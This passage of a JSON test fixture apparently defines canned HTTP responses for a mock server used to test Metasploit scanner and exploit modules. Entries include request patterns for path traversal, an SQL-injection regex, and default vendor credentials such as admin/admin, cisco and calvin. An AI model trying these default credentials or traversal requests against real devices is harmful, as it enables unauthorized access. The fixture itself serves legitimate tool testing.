 346 | 			["HTTP/1.1 200 OK\r\nContent-Length: 18\r\n\r\n{\"success\": false}"]
 347 | 		]
 348 | 	},
 349 | 	"auxiliary/scanner/http/git_scanner": {
 350 | 		"defaultPort": [80],
 351 | 		"seq": [
 352 | 			["starts", "GET /.git/index"],
 353 | 			["HTTP/1.1 200 OK\r\nContent-Length: 12\r\n\r\nDIRC", ["N", 12], ["N", 200]],
 354 | 			["starts", "GET /.git/config"],
 355 | 			["HTTP/1.1 200 OK\r\nContent-Length: 12\r\n\r\nDIRC[remote]"],
 356 | 			["any"],
 357 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 358 | 		]
 359 | 	},
 360 | 	"auxiliary/scanner/http/goahead_traversal": {
 361 | 		"defaultPort": [80],
 362 | 		"seq": [
 363 | 			["any"],
 364 | 			["HTTP/1.1 200 OK\r\nServer: GoAhead\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 365 | 		]
 366 | 	},
 367 | 	"auxiliary/scanner/http/groupwise_agents_http_traversal": {
 368 | 		"defaultPort": [80],
 369 | 		"seq": [
 370 | 			["any"],
 371 | 			["HTTP/1.1 200 OK\r\nServer: GroupWise\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 372 | 		]
 373 | 	},
 374 | 	"auxiliary/scanner/http/host_header_injection": {
 375 | 		"defaultPort": [80],
 376 | 		"seq": [
 377 | 			["any"],
 378 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nevil.com!!"]
 379 | 		]
 380 | 	},
 381 | 	"auxiliary/scanner/http/http_header": {
 382 | 		"defaultPort": [80],
 383 | 		"seq": [
 384 | 			["starts", "HEAD / HTTP/1.1"],
 385 | 			["HTTP/1.1 200 OK\r\nServer: Rapid7\r\nContent-Length: 0\r\n\r\n"]
 386 | 		]
 387 | 	},
 388 | 	"auxiliary/scanner/http/http_login": {
 389 | 		"defaultPort": [80],
 390 | 		"seq": [
 391 | 			["substr", "Authorization: Basic YWRtaW46cGFzc3dvcmQ="],
 392 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwelcome!!!"],
 393 | 			["starts", "GET /"],
 394 | 			["HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Basic realm=\"myRealm\"\r\nContent-Length: 0\r\n\r\n"]
 395 | 		]
 396 | 	},
 397 | 	"auxiliary/scanner/http/http_put": {
 398 | 		"defaultPort": [80],
 399 | 		"seq": [
 400 | 			["starts", "PUT /", "saveHttpBody"],
 401 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwelcome!!!"],
 402 | 			["starts", "GET /"],
 403 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", ["saved"]]
 404 | 		]
 405 | 	},
 406 | 	"auxiliary/scanner/http/http_traversal": {
 407 | 		"defaultPort": [80],
 408 | 		"seq": [
 409 | 			["any"],
 410 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 411 | 		]
 412 | 	},
 413 | 	"auxiliary/scanner/http/http_version": {
 414 | 		"defaultPort": [80],
 415 | 		"seq": [
 416 | 			["any"],
 417 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 418 | 		]
 419 | 	},
 420 | 	"auxiliary/scanner/http/iis_internal_ip": {
 421 | 		"defaultPort": [80],
 422 | 		"seq": [
 423 | 			["any"],
 424 | 			["HTTP/1.1 301 Moved\r\nLocation: http://10.11.12.13/login?\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 425 | 		]
 426 | 	},
 427 | 	"auxiliary/scanner/http/ipboard_login": {
 428 | 		"defaultPort": [80],
 429 | 		"seq": [
 430 | 			["substr", "ips_username=admin&ips_password=admin"],
 431 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: ipsconnect=coppa;\r\nContent-Length: $\r\n\r\nWelcome"],
 432 | 			["starts", "GET /forum"],
 433 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\nname='auth_key' value='abc123'"],
 434 | 			["any"],
 435 | 			["HTTP/1.1 401 Unauthorized\r\nContent-Length: $\r\n\r\nPlease try again"]
 436 | 		]
 437 | 	},
 438 | 	"auxiliary/scanner/http/jboss_vulnscan": {
 439 | 		"defaultPort": [80],
 440 | 		"seq": [
 441 | 			["starts", "HEAD /"],
 442 | 			["http://10.11.12.13/login?\r\nContent-Length: 10\r\n\r\nwelcome!!!"],
 443 | 			["starts", "GET /"],
 444 | 			["HTTP/1.1 401 Unauthorized\r\nContent-Length: $\r\n\r\nJBoss 2.0: Please try again"]
 445 | 		]
 446 | 	},
 447 | 	"auxiliary/scanner/http/jenkins_command": {
 448 | 		"defaultPort": [80],
 449 | 		"seq": [
 450 | 			["starts", "POST /jenkin"],
 451 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: JSESSIONID=12345678;\r\nContent-Length: $\r\n\r\n<pre>Jenkins.instance.pluginManager.plugins</pre><pre>java.plugin: ver2.0</pre>"],
 452 | 			["starts", "GET /jenkins/systemInfo HTTP"],
 453 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: JSESSIONID=12345678;\r\nContent-Length: $\r\n\r\nSystem Properties\nEnvironment Variables\nRemember me on this computer\n\".crumb\", \"abcd1234\"\nos.name<td>Windows7\nos.version"]
 454 | 		]
 455 | 	},
 456 | 	"auxiliary/scanner/http/jenkins_enum": {
 457 | 		"defaultPort": [80],
 458 | 		"seq": [
 459 | 			["starts", "GET /jenkins"],
 460 | 			["HTTP/1.1 200 OK\r\nX-Jenkins: 2.0\r\nSet-Cookie: JSESSIONID=12345678;\r\nContent-Length: $\r\n\r\nSystem Properties\nEnvironment Variables\nRemember me on this computer\n\".crumb\", \"abcd1234\"\nos.name<td>Windows7\nos.version</td>"]
 461 | 		]
 462 | 	},
 463 | 	"auxiliary/scanner/http/joomla_bruteforce_login": {
 464 | 		"defaultPort": [80],
 465 | 		"seq": [
 466 | 			["starts", "GET /login"],
 467 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: JSID=12345;\r\nContent-Length: $\r\n\r\n<form action=abc.php method=\"post\" id=\"form-login\"><input type=\"hidden\" value=\"1\"/><input type=\"hidden\" value=\"2\"/><input type=\"hidden\" value=\"3\"/><input type=\"hidden\" value=\"4\"/><input type=\"hidden\" value=\"5\"/><input type=\"hidden\" name=\"id6\" value=\"6\"/><input type=\"hidden\" name=\"id7\" value=\"7\"/></form>"],
 468 | 			["substr", "username=vagrant&passwd=vagrant"],
 469 | 			["HTTP/1.1 302 Moved\r\nLocation: /main.html\r\nContent-Length: $\r\n\r\n"],
 470 | 			["any"],
 471 | 			["HTTP/1.1 302 Moved\r\nLocation: /login\r\nContent-Length: $\r\n\r\nmod-login-username"]
 472 | 		]
 473 | 	},
 474 | 	"auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner": {
 475 | 		"defaultPort": [80],
 476 | 		"seq": [
 477 | 			["regex", "CONCAT\\%..0x([0-9a-f]+)\\%..0x([0-9a-f]+)\\%..0x([0-9a-f]+)"],
 478 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", ["H*", "$1"],["H*", "$2"],["H*", "$3"]]
 479 | 		]
 480 | 	},
 481 | 	"auxiliary/scanner/http/joomla_gallerywd_sqli_scanner": {
 482 | 		"defaultPort": [80],
 483 | 		"seq": [
 484 | 			["regex", "CONCAT\\%..0x([0-9a-f]+)\\%..0x([0-9a-f]+)\\%..0x([0-9a-f]+)"],
 485 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", ["H*", "$1"],["H*", "$2"],["H*", "$3"]]
 486 | 		]
 487 | 	},
 488 | 	"auxiliary/scanner/http/joomla_pages": {
 489 | 		"defaultPort": [80],
 490 | 		"seq": [
 491 | 			["starts", "GET /admin/ HTTP/1.1"],
 492 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\nadministration console\n"],
 493 | 			["any"],
 494 | 			["HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n"]
 495 | 		]
 496 | 	},
 497 | 	"auxiliary/scanner/http/joomla_plugins": {
 498 | 		"desc": "there is a bug in this module, raised the issue in #7854",
 499 | 		"defaultPort": [80],
 500 | 		"seq": [
 501 | 			["starts", "GET / "],
 502 | 			["HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nwelcome!!!"],
 503 | 			["any"],
 504 | 			["HTTP/1.1 200 Ok\r\nContent-Length: 15\r\n\r\nfoundit plugin!"]
 505 | 		]
 506 | 	},
 507 | 	"auxiliary/scanner/http/joomla_version": {
 508 | 		"defaultPort": [80],
 509 | 		"seq": [
 510 | 			["starts", "GET /administrator/manifests/files/joomla.xml"],
 511 | 			["HTTP/1.1 200 OK\r\nServer: joomla 2.0\r\nContent-Length: $\r\n\r\n<version>ver2.0</version>"],
 512 | 			["starts", "GET / "],
 513 | 			["HTTP/1.1 200 OK\r\nServer: joomla 2.0\r\nContent-Length: $\r\n\r\n<html><body><META content=\"joomla!\"></body></html>"],
 514 | 			["any"],
 515 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 516 | 		]
 517 | 	},
 518 | 	"auxiliary/scanner/http/linknat_vos_traversal": {
 519 | 		"defaultPort": [80],
 520 | 		"seq": [
 521 | 			["any"],
 522 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 523 | 		]
 524 | 	},
 525 | 	"auxiliary/scanner/http/linksys_e1500_traversal": {
 526 | 		"defaultPort": [80],
 527 | 		"seq": [
 528 | 			["any"],
 529 | 			["HTTP/1.1 200 OK\r\nServer: httpd\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 530 | 		]
 531 | 	},
 532 | 	"auxiliary/scanner/http/litespeed_source_disclosure": {
 533 | 		"defaultPort": [80],
 534 | 		"seq": [
 535 | 			["any"],
 536 | 			["HTTP/1.1 200 OK\r\nServer: LiteSpeed\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 537 | 		]
 538 | 	},
 539 | 	"auxiliary/scanner/http/lucky_punch": {
 540 | 		"desc": "the code is not complete, just send the req.",
 541 | 		"defaultPort": [80],
 542 | 		"seq": [
 543 | 			["any"],
 544 | 			["HTTP/1.1 200 OK\r\nServer: LiteSpeed\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 545 | 		]
 546 | 	},
 547 | 	"auxiliary/scanner/http/cisco_asa_asdm": {
 548 | 		"defaultPort": [443],
 549 | 		"seq": [
 550 | 			["starts", "GET "],
 551 | 			["HTTP/1.1 401 Not Authorized\r\nWWW-Authenticate: NTLM\r\nContent-Length: 10\r\n\r\nWelcome!!!"],
 552 | 			["starts", "POST "],
 553 | 			["HTTP/1.1 200 OK\r\nContent-Length: 32\r\n\r\nSSL VPN Service Success success!"]
 554 | 		]
 555 | 	},
 556 | 	"auxiliary/scanner/http/owa_login": {
 557 | 		"defaultPort": [443],
 558 | 		"extraCmds": "set USERPASS_FILE userpass.lst",
 559 | 		"seq": [
 560 | 			["starts", "GET /aspnet_client"],
 561 | 			["HTTP/1.1 401 Not Authorized\r\nWWW-Authenticate:NTLM TlRMTVNTUAACAAAADAAMADAAAAABAoEAAAABI0VnZXhhbXBsZQAAAAAAYgBiADwAAAAAAEQATwBNAEEASQBOAAIADABEAE8ATQBBAAAASQBOAAEADABTAEUAUgBWAEUAUgAEABQAAABkAG8AbQBhAGkAbgAuAGMAbwBtAAMAIgAAAHMAZQByAHYAZQByAC4AZABvAG0AYQBpAAAAbgAuAGMAbwBtAAAAAAA=\r\nContent-Length: 10\r\n\r\nWelcome!!!"],
 562 | 			["substr", "username=DOMA\\root&password=password"],
 563 | 			["HTTP/1.1 301 Redirect\r\nLocation: /expiredpassword\r\nContent-Length: 0\r\n\r\n"],
 564 | 			["starts", "POST /owa/auth.owa"],
 565 | 			["HTTP/1.1 301 Redirecte\r\nLocation: /login?reason=mismatch\r\nContent-Length: 10\r\n\r\nWelcome!!!"]
 566 | 		]
 567 | 	},
 568 | 	"auxiliary/scanner/http/cisco_ironport_enum": {
 569 | 		"defaultPort": [443],
 570 | 		"seq": [
 571 | 			["starts", "GET / "],
 572 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: sessid=123;\r\nContent-Length: 10\r\n\r\nWelcome!!!"],
 573 | 			["starts", "GET /help/wwhelp/wwhimpl/common"],
 574 | 			["HTTP/1.1 200 OK\r\nContent-Length: 77\r\n\r\n<title>Cisco IronPort AsyncOS 10.2 for Security Management Appliances</title>"],
 575 | 			["substr", "username=admin&password=ironport"],
 576 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: authenticated=1;\r\nContent-Length: 10\r\n\r\nWelcome!!!"]
 577 | 		]
 578 | 	},
 579 | 	"auxiliary/scanner/http/chef_webui_login": {
 580 | 		"defaultPort": [443],
 581 | 		"seq": [
 582 | 			["starts", "GET /users/login"],
 583 | 			["HTTP/1.1 200 OK\r\nContent-Length: 87\r\n\r\n<title>Chef Server</title><input name=\"authenticity_token\" type=\"hidden\" value=\"12345\">"],
 584 | 			["starts", "GET /users/admin/edit"],
 585 | 			["HTTP/1.1 200 OK\r\nContent-Length: 25\r\n\r\nNew password for the User"],
 586 | 			["substr", "name=admin&password=admin"],
 587 | 			["HTTP/1.1 302 Moved\r\nContent-Length: 25\r\n\r\nNew password for the User"],
 588 | 			["starts", "POST /users/login_exec"],
 589 | 			["HTTP/1.1 200 OK\r\nContent-Length: 25\r\n\r\nNew password for the User"]
 590 | 		]
 591 | 	},
 592 | 	"auxiliary/scanner/http/cisco_nac_manager_traversal": {
 593 | 		"defaultPort": [443],
 594 | 		"seq": [
 595 | 			["any"],
 596 | 			["HTTP/1.1 200 OK\r\nContent-Type: application/json\r\nContent-Length: $\r\n\r\n{\"message\": \"success\"}"]
 597 | 		]
 598 | 	},
 599 | 	"auxiliary/scanner/http/cisco_ssl_vpn": {
 600 | 		"defaultPort": [443],
 601 | 		"seq": [
 602 | 			["substr", "password=cisco"],
 603 | 			["HTTP/1.1 200 OK\r\nContent-Length: 29\r\n\r\nSSL VPN Service,webvpn_logout"],
 604 | 			["substr", "fcadbadd=1 HTTP"],
 605 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwebvpnlogin"],
 606 | 			["starts", "GET /+CSCOE+/logon.html"],
 607 | 			["HTTP/1.1 302 Moved\r\nContent-Length: 10\r\n\r\nWelcome!!!"],
 608 | 			["any"],
 609 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nWelcome!!!"]
 610 | 			
 611 | 		]
 612 | 	},
 613 | 	"auxiliary/scanner/http/cisco_ssl_vpn_priv_esc": {
 614 | 		"defaultPort": [443],
 615 | 		"seq": [
 616 | 			["starts", "GET /admin/exec/show+version"],
 617 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: webvpn=1234;\r\nContent-Length: 55\r\n\r\nCisco Adaptive Security Appliance Software Version 10.87"],
 618 | 			["substr", "password=clientless"],
 619 | 			["HTTP/1.1 200 OK\r\nSet-Cookie: webvpn=1234;\r\nContent-Length: 29\r\n\r\nSSL VPN Service,webvpn_logout"],
 620 | 			["substr", "fcadbadd=1 HTTP"],
 621 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwebvpnlogin"],
 622 | 			["starts", "GET /+CSCOE+/logon.html"],
 623 | 			["HTTP/1.1 302 Moved\r\nContent-Length: 10\r\n\r\nWelcome!!!"],
 624 | 			["any"],
 625 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nWelcome!!!"]
 626 | 			
 627 | 		]
 628 | 	},
 629 | 	"auxiliary/scanner/http/dell_idrac": {
 630 | 		"defaultPort": [443],
 631 | 		"seq": [
 632 | 			["starts", "GET "],
 633 | 			["HTTP/1.1 200 OK\r\nContent-Length: 13\r\n\r\n<authResult>1"],
 634 | 			["substr", "password=calvin"],
 635 | 			["HTTP/1.1 200 OK\r\nContent-Length: 26\r\n\r\n<authResult>0<\/authResult>"],
 636 | 			["starts", "POST "],
 637 | 			["HTTP/1.1 200 OK\r\nContent-Length: 26\r\n\r\n<authResult>6<\/authResult>"]
 638 | 		]
 639 | 	},
 640 | 	"auxiliary/scanner/http/http_hsts": {
 641 | 		"defaultPort": [443],
 642 | 		"seq": [
 643 | 			["starts", "GET / HTTP/1.1"],
 644 | 			["HTTP/1.1 200 OK\r\nStrict-Transport-Security: max-age=31536000\r\nContent-Length: 0\r\n\r\n"]
 645 | 		]
 646 | 	},
 647 | 	"auxiliary/scanner/http/infovista_enum": {
 648 | 		"defaultPort": [443],
 649 | 		"seq": [
 650 | 			["starts", "GET /VPortal/ HTTP/1.1"],
 651 | 			["HTTP/1.1 200 OK\r\nStrict-Transport-Security: max-age=31536000\r\nContent-Length: 0\r\n\r\n", "InfoVista VistaPortal\nPORTAL_VERSION = 2.0"],
 652 | 			["starts", "POST /VPortal/mgtconsole/CheckPassword.jsp"],
 653 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\nlocation.href AdminFrame.jsp"]
 654 | 		]
 655 | 	},
 656 | 	"auxiliary/scanner/http/glassfish_login": {
 657 | 		"defaultPort": [4848],
 658 | 		"seq": [
 659 | 			["starts", "GET /common/applications/uploadFrame.jsf"],
 660 | 			["HTTP/1.1 200 OK\r\nServer: GlassFish v3\r\nContent-Length: 37\r\n\r\n<title>Deploy Applications or Modules"],
 661 | 			["substr", "j_username=root&j_password=password"],
 662 | 			["HTTP/1.1 302 Moved\r\nServer: GlassFish v3\r\nContent-Length: 45\r\n\r\n<title>Deploy Enterprise Applications/Modules"],
 663 | 			["starts", "POST /j_security_check"],
 664 | 			["HTTP/1.1 404 Not Found\r\nServer: GlassFish v3\r\nContent-Length: 45\r\n\r\n<title>Deploy Enterprise Applications/Modules"],
 665 | 			["starts", "GET /login.jsf"],
 666 | 			["HTTP/1.1 302 Moved\r\nServer: GlassFish Server 3.2\r\nSet-Cookie: JSESSIONID=1234;\r\nContent-Length: 10\r\n\r\nwelcome!!!"],
 667 | 			["starts", "GET /common/index.jsf"],
 668 | 			["HTTP/1.1 200 OK\r\nServer: GlassFish v2\r\nContent-Length: 10\r\n\r\nwelcome!!!"],
 669 | 			["any"],
 670 | 			["HTTP/1.1 404 Not Found\r\nServer: GlassFish v2\r\nContent-Length: 10\r\n\r\nTry again!"]
 671 | 		]
 672 | 	},
 673 | 	"auxiliary/scanner/x11/open_x11": {
 674 | 		"defaultPort": [6000],
 675 | 		"seq": [
 676 | 			["equal", ["H*", "6c000b000000000000000000"]],
 677 | 			[["C", 1], ["repeat", " ", 23], ["v", 12], ["repeat", " ", 14], "rapid7rocks!"]
 678 | 		]
 679 | 	},
 680 | 	"auxiliary/scanner/http/manageengine_deviceexpert_traversal": {
 681 | 		"defaultPort": [6060],
 682 | 		"seq": [
 683 | 			["any"],
 684 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 685 | 		]
 686 | 	},
 687 | 	"auxiliary/scanner/http/manageengine_deviceexpert_user_creds": {
 688 | 		"defaultPort": [6060],
 689 | 		"seq": [
 690 | 			["starts", "GET /ReadUsersFromMasterServlet"],
 691 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n<discoverydata><username>john</username><password>vZnXhXX9w+nNPeTeHKGW2g</password><userrole>admin</userrole><emailid>john@abc.com</emailid><saltvalue>deadface</saltvalue></discoverydata>"]
 692 | 		]
 693 | 	},
 694 | 	"auxiliary/scanner/http/appletv_login": {
 695 | 		"defaultPort": [7000],
 696 | 		"seq": [
 697 | 			["any"],
 698 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nWelcome!!!"]
 699 | 		]
 700 | 	},
 701 | 	"auxiliary/scanner/http/groupwise_agents_http_traversal": {
 702 | 		"defaultPort": [7181],
 703 | 		"seq": [
 704 | 			["any"],
 705 | 			["HTTP/1.1 200 OK\r\nServer: GroupWise\r\nContent-Length: 10\r\n\r\nwelcome!!!"]
 706 | 		]
 707 | 	},
 708 | 	"exploit/linux/http/tr064_ntpserver_cmdinject": {
 709 | 		"defaultPort": [7547],
 710 | 		"seq": [
 711 | 			["starts", "GET /globe"],
 712 | 			["HTTP/1.1 404 OK\r\nContent-Length: 12\r\n\r\nhome_wan.htm"],
 713 | 			["substr", "SetNTPServers"],
 714 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nWelcome!!!"],
 715 | 			["substr", "GetSecurityKeys"],
 716 | 			["HTTP/1.1 200 OK\r\nContent-Length: 42\r\n\r\nNewPreSharedKey>987654321<\/NewPreSharedKey"]
 717 | 		]
 718 | 	},
 719 | 	"auxiliary/scanner/http/barracuda_directory_traversal": {
 720 | 		"defaultPort": [8000],
 721 | 		"seq": [
 722 | 			["any"],
 723 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", ["append", "<html>", ["repeat", " ", 100], "<div src=\"barracuda.css\"></div>hello world</html>"]]
 724 | 		]
 725 | 	},
 726 | 	"auxiliary/scanner/http/chromecast_webserver": {
 727 | 		"defaultPort": [8008],
 728 | 		"seq": [
 729 | 			["substr", "j_username=admin&j_password=admin&"],
 730 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nWelcome!!!"],
 731 | 			["any"],
 732 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", "{\"name\": \"jon\", \"ssid\": \"myPrivateSSID\"}"]
 733 | 		]
 734 | 	},
 735 | 	"auxiliary/scanner/http/manageengine_desktop_central_login": {
 736 | 		"defaultPort": [8020],
 737 | 		"seq": [
 738 | 			["substr", "j_username=admin&j_password=admin&"],
 739 | 			["HTTP/1.1 302 Moved\r\nLocation: /main.html\r\nContent-Length: 0\r\n\r\n"],
 740 | 			["any"],
 741 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\nManageEngine Desktop Central"]
 742 | 		]
 743 | 	},
 744 | 	"auxiliary/scanner/http/axis_local_file_include": {
 745 | 		"defaultPort": [8080],
 746 | 		"seq": [
 747 | 			["any"],
 748 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", "axisconfig<div>parameter name=\"userName\">jdole</div><div>parameter name=\"password\">pass123</div>"]
 749 | 		]
 750 | 	},
 751 | 	"auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal": {
 752 | 		"defaultPort": [8080],
 753 | 		"seq": [
 754 | 			["starts", "GET /imc/login.jsf"],
 755 | 			["HTTP/1.1 200 OK\r\nContent-Length: 32\r\n\r\nHP Intelligent Management Center"],
 756 | 			["starts", "GET /imc/bimsDownload?fileName=../.."],
 757 | 			["HTTP/1.1 200 OK\r\nContent-Type: application/doc\r\nContent-Length: 10\r\n\r\nmy secrete"]
 758 | 		]
 759 | 	},
 760 | 	"auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal": {
 761 | 		"defaultPort": [8080],
 762 | 		"seq": [
 763 | 			["starts", "GET /imc/login.jsf"],
 764 | 			["HTTP/1.1 200 OK\r\nContent-Length: 32\r\n\r\nHP Intelligent Management Center"],
 765 | 			["starts", "GET /imc/tmp/fault/download?fileName=../../"],
 766 | 			["HTTP/1.1 200 OK\r\nContent-Type: application/doc\r\nContent-Length: 10\r\n\r\nmy secrete"]
 767 | 		]
 768 | 	},
 769 | 	"auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal": {
 770 | 		"defaultPort": [8080],
 771 | 		"seq": [
 772 | 			["starts", "GET /imc/login.jsf"],
 773 | 			["HTTP/1.1 200 OK\r\nContent-Length: 32\r\n\r\nHP Intelligent Management Center"],
 774 | 			["starts", "GET /imc/tmp/ict/download?fileName=../../"],
 775 | 			["HTTP/1.1 200 OK\r\nContent-Type: application/doc\r\nContent-Length: 10\r\n\r\nmy secrete"]
 776 | 		]
 777 | 	},
 778 | 	"auxiliary/scanner/http/hp_imc_reportimgservlt_traversal": {
 779 | 		"seq": [
 780 | 			["starts", "GET /imc/login.jsf"],
 781 | 			["HTTP/1.1 200 OK\r\nContent-Length: 32\r\n\r\nHP Intelligent Management Center"],
 782 | 			["starts", "GET /imc/reportImg?path=../.."],
 783 | 			["HTTP/1.1 200 OK\r\nContent-Type: image/png\r\nContent-Length: 10\r\n\r\nmy secrete"]
 784 | 		]
 785 | 	},
 786 | 	"auxiliary/scanner/http/hp_imc_som_file_download": {
 787 | 		"defaultPort": [8080],
 788 | 		"seq": [
 789 | 			["starts", "GET /servicedesk/ServiceDesk.jsp"],
 790 | 			["HTTP/1.1 200 OK\r\nContent-Type: application/doc\r\nContent-Length: $\r\n\r\nservicedesk/servicedesk"],
 791 | 			["starts", "GET /servicedesk/servicedesk/fileDownload?OperType"],
 792 | 			["HTTP/1.1 200 OK\r\nContent-Type: application/doc\r\nContent-Length: $\r\n\r\nMy secret, hahaha"]
 793 | 		]
 794 | 	},
 795 | 	"auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess": {
 796 | 		"defaultPort": [8080],
 797 | 		"seq": [
 798 | 			["starts", "GET /SiteScope/services/APISiteScopeImpl HTTP"],
 799 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\nWelcome"],
 800 | 			["substr", "testme.rapid7.com"],
 801 | 			["HTTP/1.1 200 OK\r\nContent-Type: multipart; boundary=\"123456789\"\r\nContent-Length: $\r\n\r\ngetFileInternalReturn href=\"cid:DEADFACE\"\r\nDEADFACE>\r\n\r\n", ["gzip", "my secrets are all here!!"], "\r\n--123456789"],
 802 | 			["starts", "POST /SiteScope/services/"],
 803 | 			["HTTP/1.1 500 Internal Error\r\nContent-Length: $\r\n\r\n<ns3:hostname xmlns:ns3=\"http://xml.apache.org/axis/\">testme.rapid7.com</ns3:hostname>"]
 804 | 		]
 805 | 	},
 806 | 	"auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration": {
 807 | 		"defaultPort": [8080],
 808 | 		"seq": [
 809 | 			["starts", "GET /SiteScope/services/APISiteScopeImpl HTTP"],
 810 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\nWelcome"],
 811 | 			["starts", "POST /SiteScope/services/APISiteScopeImpl"],
 812 | 			["HTTP/1.1 200 OK\r\nContent-Type: multipart; boundary=\"123456789\"\r\nContent-Length: $\r\n\r\ngetSiteScopeConfigurationReturn href=\"cid:DEADFACE\"\r\nDEADFACE>\r\n\r\n", ["gzip", "my secrets are all here!!"], "\r\n--123456789"]
 813 | 		]
 814 | 	},
 815 | 	"auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess": {
 816 | 		"defaultPort": [8080],
 817 | 		"seq": [
 818 | 			["starts", "GET /SiteScope/services/APIMonitorImpl HTTP"],
 819 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\nWelcome"],
 820 | 			["starts", "POST /SiteScope/services/APIMonitorImpl"],
 821 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n<loadFileContentReturn xsi:type=\"xsd:string\">This is my secret hahahah!!!</loadFileContentReturn>"]
 822 | 		]
 823 | 	},
 824 | 	"auxiliary/scanner/http/jboss_status": {
 825 | 		"defaultPort": [8080],
 826 | 		"seq": [
 827 | 			["any"],
 828 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n<title>Tomcat Status</title><strong></strong></td><td>1<\/td><td>2<\/td><td>3<\/td><td>4<\/td><td nowrap>50<\/td><td nowrap>60<\/td><\/tr><strong></strong></td><td>1b<\/td><td>2b<\/td><td>3b<\/td><td>4b<\/td><td nowrap>50b<\/td><td nowrap>60b<\/td><\/tr>"]
 829 | 		]
 830 | 	},
 831 | 	"auxiliary/scanner/http/jenkins_login": {
 832 | 		"defaultPort": [8080],
 833 | 		"seq": [
 834 | 			["substr", "j_username=admin&j_password=admin"],
 835 | 			["HTTP/1.1 302 Moved\r\nLocation: /index.html\r\nContent-Length: $\r\n\r\n<title>Tomcat Status</title>"],
 836 | 			["any"],
 837 | 			["HTTP/1.1 302 Moved\r\nLocation: /loginError\r\nContent-Length: $\r\n\r\n<title>Tomcat Status</title>"]
 838 | 		]
 839 | 	},
 840 | 	"auxiliary/scanner/http/influxdb_enum": {
 841 | 		"defaultPort": [8086],
 842 | 		"seq": [
 843 | 			["starts", "GET /db HTTP"],
 844 | 			["HTTP/1.1 200 OK\r\nX-Influxdb-Version: 2.0\r\nContent-Length: $\r\n\r\n", "{\"user\": \"admin\", \"password\": \"letmein\"}"]
 845 | 		]
 846 | 	},
 847 | 	"auxiliary/scanner/http/apache_activemq_traversal": {
 848 | 		"defaultPort": [8161],
 849 | 		"seq": [
 850 | 			["starts", "GET /\\.."],
 851 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", ["file", "secret.txt"]]
 852 | 		]
 853 | 	},
 854 | 	"auxiliary/scanner/http/apache_activemq_source_disclosure": {
 855 | 		"defaultPort": [8161],
 856 | 		"seq": [
 857 | 			["starts", "GET /admin/index.jsp"],
 858 | 			["HTTP/1.1 200 OK\r\nContent-Length: $\r\n\r\n", ["file", "secret.txt"]]
 859 | 		]
 860 | 	},
 861 | 	"auxiliary/scanner/http/atlassian_crowd_fileaccess": {
 862 | 		"defaultPort": [8095],
 863 | 		"seq": [
 864 | 			["starts", "GET "],
 865 | 			["HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nWelcome!!!"],
 866 | 			["starts", "POST /crowd/services"],
 867 | 			["HTTP/1.1 500 Server Internal Error\r\nContent-Length: $\r\n\r\n", "<faultstring>Invalid boolean value: ?9876543210haha</faultstring>"]
 868 | 		]
 869 | 	},
